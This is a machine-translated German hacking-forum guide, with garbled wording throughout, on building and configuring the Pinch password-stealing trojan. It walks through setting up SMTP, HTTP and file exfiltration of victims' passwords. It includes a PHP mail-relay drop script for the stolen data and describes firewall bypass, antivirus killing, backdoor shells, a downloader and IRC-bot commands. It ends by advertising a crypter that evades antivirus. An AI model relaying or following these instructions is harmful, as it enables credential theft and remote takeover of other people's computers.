This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen Seife, wir verwenden BrutusAET2


MATERIAL IST FÜR WESENTLICHE ZWECKE EINGESETZT. DER AUTOR ÜBERNIMMT KEINE VERANTWORTUNG


-------------------------------------------------- ----------------
Teil 1. Alt, aber nützlich. für Prise 1

***********************
Anleitung für Pinch 1.0
***********************

=====
Intro
=====

Bitte wundern Sie sich nicht, dass ich mich dazu entschlossen habe, einen ähnlichen Artikel zu schreiben (Artikel für lamerzzz). Tatsache ist, dass in meinem Forum (http://forum.web-hack.ru) etwa alle drei Tage ein Thema erstellt wird, wie "Wie richte ich Pinch richtig ein und verwende es?", "Wie verwende ich Pinch ʻem?" usw.

===========
Möglichkeiten
===========

Dieser Trojaner war im Jahr 2003/2004 ziemlich verbreitet. Alles dank der Möglichkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM & RQ, The Bat! ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp unterstützt), geringes Gewicht, Open Source und einfach zu erstellende Software für eine bestimmte Aufgabe. Troyan hat folgende Eigenschaften:

- Senden Sie die Computerkonfiguration des Opfers: Betriebssystem, RAM, CPU, Festplatte, angemeldeter Benutzer, Hostname, IP
- Keylogger (Key-Log)
- Remote-Konsole (Remote-Konsole)
- Firewall umgehen
- Senden aller Passwörter per E-Mail über den SMTP-Server
- Verschlüsselung von gestohlenen Passwörtern per Post
- Trojaner nach dem Start automatisch löschen
- HTML / Text-Berichte
- Die Dateigröße beträgt ca. 10 KB
- Modulares System
- Und vieles mehr...

Troyan schrieb coban2k (http://www.cobans.net) - eine ziemlich berühmte Person in der Welt des ICQ-Hackings. Aufgrund von Problemen mit dem Hosting beim Speichern des Trojaners auf dem Server war der Autor gezwungen, diese Erstellung von seiner Website zu entfernen. Leider finden fast alle Antivirenprogramme diese Malware und können nur an ein Opfer gesendet werden, das kein Antivirenprogramm hat.

============
Komplettset
============

Das Archiv (pinch_1.0.zip) mit einem Trojaner enthält die folgenden Ordner und Dateien:

\ PinchBuilder.exe - Trojaner-Assistent
\ Parser.exe - Programm zum Entschlüsseln verschlüsselter E-Mails mit Passwörtern
\ readme.txt - keine Kommentare
\ Pinch \ - Hauptordner mit Trojaner als Quelle und Compiler
\ Quellen \ - andere Quellen
\ TB! 2 Plugin (Auto-Parser) \ - Ein Ordner mit einem Plugin für The Bat 2 !, das verschlüsselte Buchstaben mit Passwörtern entschlüsselt, die in Ihrem Posteingang eingehen
\ Sources \ Script \ - PHP-Skript, über das Passwörter gesendet werden, wenn die entsprechende Option beim Kompilieren ausgewählt wird (siehe unten)

================
Kompiliere troy
================

Im Lieferumfang ist ein spezieller Assistent (PinchBuilder.exe) enthalten, der den Trojaner gemäß Ihren Anforderungen erstellt und den Trojaner direkt auf Ihrem Computer kompiliert. Das Programm hat zwei Hauptregisterkarten: Kompilieren und Entschlüsseln. Der erste dient zum Erstellen eines Trojaners und der zweite zum Entschlüsseln von Kennwörtern (tatsächlich ist diese Registerkarte das Ergebnis der Datei Parser.exe). Als nächstes folgen drei Unterregisterkarten: SMTP, HTTP und FILE. Sie legen die Option zum Anzeigen von Kennwörtern fest. Lassen Sie uns jedes genauer untersuchen:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Serverdomäne eingegeben haben, klicken Sie auf Auflösen, damit die Serverdomäne wie eine IP-Adresse aussieht. Als nächstes geben wir in den Feldern Von und Bis unsere Seife an. Die Schaltfläche Testmassage senden dient zum Versenden eines Testbriefes durch die von Ihnen festgelegten Einstellungen. Ich kann sie nur empfehlen. Wenn der Brief nicht eintrifft, gibt es Probleme beim Senden (Firewall aktiviert, schlechtes SMTP, nicht auf Auflösen geklickt, usw.).

Ich möchte darauf hinweisen, dass in letzter Zeit die meisten Anbieter zu einem System wechseln, mit dem ihre Kunden E-Mails NUR von IHREM SMTP-Server senden können. In solchen Fällen empfehle ich, die Methode zum Senden von Briefen über HTTP zu verwenden.

====
HTTP
====

Laden Sie die Datei \ Sources \ Script \ view.php auf den Server hoch, der PHP-Skripte unterstützt und die Funktion mail () ausführt. Weiter im URL-Feld geben wir den Pfad zu diesem Skript an (zum Beispiel http://www.xss.ru/pinch.php). Im Feld Betreff geben wir den Namen des Themas an, von dem die Briefe gesendet werden. Im Feld Status check str sollte sich eine Zeichenfolge befinden, die vom Skript nach dem Laden ausgegeben wird. In dem Skript, das mit dem Troye geliefert wird, ist es wichtig: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, versucht er, jede Minute eine E-Mail über dieses Skript zu senden, bis er im Feld Status check str eine Antwort erhält. Ich empfehle, dass Sie das Skript nicht aus der Standardlieferung verwenden, sondern von mir geschrieben:

<html> <body>
<? php
// Autor: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) und isset ($ subject) und isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Es macht fast dasselbe, ist aber kompetenter geschrieben. Ein großer Vorteil bei dieser Methode zum Senden von Kennwörtern ist die Tatsache, dass Sie Kennwörter senden können, um die Firewall zu umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Outpost-Protokoll, wenn Sie ein Passwort über ein Skript von meiner Site senden:

Prozessname: iexplorer.exe
Protokoll: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder hat verstanden, wer nicht im Tank ist =) Auch von den Profis kann ich die Fähigkeit hervorheben, verschlüsselte E-Mails auf Ihrer Site zu schreiben, anstatt sie an Seife zu senden; die Möglichkeit, die Seife zu ändern, an die Passwörter gesendet werden, falls sie gelöscht werden; während der Massenverteilung von Troy (damit Passwörter auch von jenen Providern gesendet werden können, bei denen der Zugriff auf alle SMTP-Server außer diesen deaktiviert ist)

====
DATEI
====

Diese Registerkarte legt den Pfad zu der Datei fest, in der alle Kennwörter gespeichert sind. Dazu müssen Sie den Pfad zu der Datei in das Feld Pfad schreiben (z. B. C: \ password.txt).

================
Compiler-Optionen
================

In diesem Bereich ist alles klar, dann müssen Sie nur die Felder ankreuzen, in denen Sie es brauchen. Beachten Sie das Feld Symbol hinzufügen. Es gibt den Pfad zu dem Symbol an, mit dem der kompilierte Trojaner angezeigt wird. Ich möchte darauf hinweisen, dass ich Troy auf meinem System (Windows XP) mit aktivierter Option nicht kompilieren konnte und deaktivieren musste.

Geben Sie in den Feldern des Protokolls die Methode an, über die Passwörter gesendet werden (SMTP / HTTP / FILE). Klicken Sie anschließend auf die Schaltfläche Kompilieren, und der Trojaner sollte kompilieren. Dieser wird mit dem Assistenten im Hauptordner gespeichert, um ihn zu erstellen.

==================
Entschlüsselung des Passworts
==================

Angenommen, Sie haben es geschafft, den Lamer in diesen Troy zu schieben, und Sie haben die Passwörter vom Auto des Opfers auf der Seife erhalten. Tatsache ist, dass beim Senden von Passwörtern diese verschlüsselt werden und erst entschlüsselt werden müssen (es sei denn, Sie haben ein spezielles Plugin für TheBat! Kopieren Sie den Text mit verschlüsselten Passwörtern in die Zwischenablage, öffnen Sie Parser.exe (oder die Registerkarte Entschlüsseln in PinchBuilder.exe) und klicken Sie auf den Kontextmenüpunkt Daten verarbeiten (oder drücken Sie einfach die Tastenkombination Alt + C). Das Programm gibt Ihnen dann alle Daten, die dem Opfer gestohlen wurden, mit einem praktischen Formular aus. Dann können Sie sie speichern oder ausdrucken.

==========
Fazit
==========

Ich möchte Sie warnen, dass Sie bei Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuchs fallen und ernsthaft bestraft werden können ;-) Ich (der Autor des Artikels) übernehme keine Verantwortung für den Schaden, der einer Person nach dem Lesen meines Artikels entstehen könnte.


----------------------------------------

teil 2. anweisung zum kneifen 2.58

Ein kleiner Artikel zur Grundeinstellung Prise. Nicht streng urteilen, sondern in voller Länge kritisieren. Pinch Setup Artikel 2.58.

Ich denke, dass es kein Problem mit Crack th gibt, es gibt keine ausführliche Hilfe, und sogar ein Video ist beigefügt. Ich möchte zeigen, wie man Bilder einstellt:

SMTP-Eigenschaften
Server (geben Sie in Ihrem Fall smtp.mail.ru ein), dann müssen Sie auf Auflösen klicken, um ihn in IP zu konvertieren (im Übrigen. Alle Betrugsfälle müssen mit dem Internet verbunden sein)

Port - lass es wie es ist

Protokoll - die Wahl, wie der Bericht über SMTP, HTTP (über PHP) und DATEI empfangen wird - auf dem Computer gespeichert. Schaltflächen mit dem gleichen Namen (SMTP, HTTP, FILE), aber in diesem Fall interessieren wir uns für SMTP und haben es bereits konfiguriert.

TestSend- Schaltfläche zum Senden einer Testnachricht an eine E-Mail.

Registerkarte PWD - Verhindert Kennwörter aus den aufgelisteten Programmen. Element ENABLE PWD beim Entfernen von daws-Berichten enthält keine Kennwörter.
Galka Senden Sie keinen alten Bericht - senden Sie keine alten Berichte.
Galki Encrypt und Packing hängen zusammen. FSG, UPX, MEW Wahl der Verpackung.

Registerkarte RUN - Wählen Sie die Startmethoden aus. Ich denke du wirst es verstehen. Ziehen Sie als ... Standart, DLL, Undelate Service. In Ordner verschieben ... oder Sie geben einen der Systemordner an oder wählen ihn aus. Rechts die Spalte Werte, die ich nicht anrührte und ehrlich gesagt vage vorstellte, warum er es ist. Unten rechts - Windows Firewall (SP2) umgehen - um die System-Firewall in SP2 zu umgehen (soweit ich den Mechanismus dieses Elements kenne - wird es als iexplorer.exe gestartet)

Die Registerkarte SPY - einige zusätzliche Berichte - hat bei mir nicht funktioniert. Screen Spy Fad - einen Screenshot machen, aber es funktionierte wieder nicht für mich (Srkin wurde gesendet, aber es war leer)

NET tab - Ich habe es nicht benutzt. Es soll:
1. Öffnen Sie einen beliebigen Port auf dem infizierten Computer und greifen Sie entsprechend darauf zu. (Ich rate dringend davon ab, ihn zu verwenden. Wenn Sie ihn nicht verschlüsseln, wenn Sie erwischt werden, werden Sie raten, was passieren wird.)
2. Downloader - ein Hinweis auf einen direkten Link zu einer Datei, die heruntergeladen und ausgeführt werden soll (schätzen Sie, welche Kosten Ihrem Feind entstehen, wenn er Verkehr hat ......))))
3. AutoUpdate - autoupdate - troy lädt nach Abschluss der Arbeit seine Kopie herunter und löscht sich dann beim nächsten Systemstart selbst. Eine neue Kopie wird gestartet (dies dient der höheren Zuverlässigkeit, damit sie nicht gefunden wird).

Registerkarte BD (Backdoor) - Die Konsole öffnet eine Shell auf dem ausgewählten Port, die über Telnet (telnet.exe) oder alternative Programme gesteuert wird. (Ich habe es nicht selbst ausprobiert)

Der ECT- Tab - Zusammenkleben mit einer beliebigen Datei sowie Installieren des Symbols ... Sie können dies auch tun, die Meldung wird angezeigt ... Aber etwas funktioniert nicht ...

Registerkarte "KILL" - Beenden eines Prozesses (Sie können versuchen, das Antivirus-Programm zu beenden), z. B. "spidernt". Anschließend wird der DrWEB-Monitor ausgeschaltet. (Ich warne Sie, ich habe dies noch nicht getan, aber ich werde es versuchen.)

IE- Registerkarte - Installieren Sie Ihre Startseite in Ihrem Browser. Hinzufügen einer Seite zu Favoriten ....

WORM tab - Soll ich nehmen, ich weiß nicht ... .....

Tab IRC-bot - Zugriff auf den Computer über IRC:
Anmeldeberechtigung
.die - bot herunterfahren
.download - Dateisprung von URL
.httpd - Dateizugriff über http an einem bestimmten Port öffnen
.killthread - Abschluss einer bestimmten Aufgabe
.proxy - Eröffnung von socks4 am ausgewählten Port mit der ausgewählten ID
.raw - Senden von Rohtext an diesen IRC-Server
.remove - Selbstlöschung
.restart - neu starten
.run - Befehle ausführen
.scan - IP-Adressen an bestimmte offene Ports scannen
.shell - Öffnen einer Shell an einem bestimmten Port (nicht 95/98 / ME)
.status - Version, IP, Startdatum anzeigen
.threads - Zeigt aktive Aufgaben an
.update - Selbstaktualisierender Bot von einer speziellen URL
.visit - besuche ausgewählte URL versteckt
.url - ausgewählte URL offen besuchen
.link - zu Favoriten hinzufügen
.sp - nach Hause machen
.msg - Nachricht (Messagebox)

Das scheint alles zu sein ... Sie drücken auf KOMPILIEREN und ein Tripel erscheint in Ihrem Ordner mit dem Builder ...

VIEL GLÜCK !!!!!

PS Dies ist, wie alles für die Überprüfung geschrieben und der Autor ist nicht verantwortlich für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Krypta-Funktionen:
Benutzter polymorpher Kryptor
KIS und Outpost umgehen (einschließlich der neuesten Versionen)
Selbstentfernung
Reduzierte Größe (normale Prise verringert sich um 3-6 KB, Zupacha Loader um 60-80 KB)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~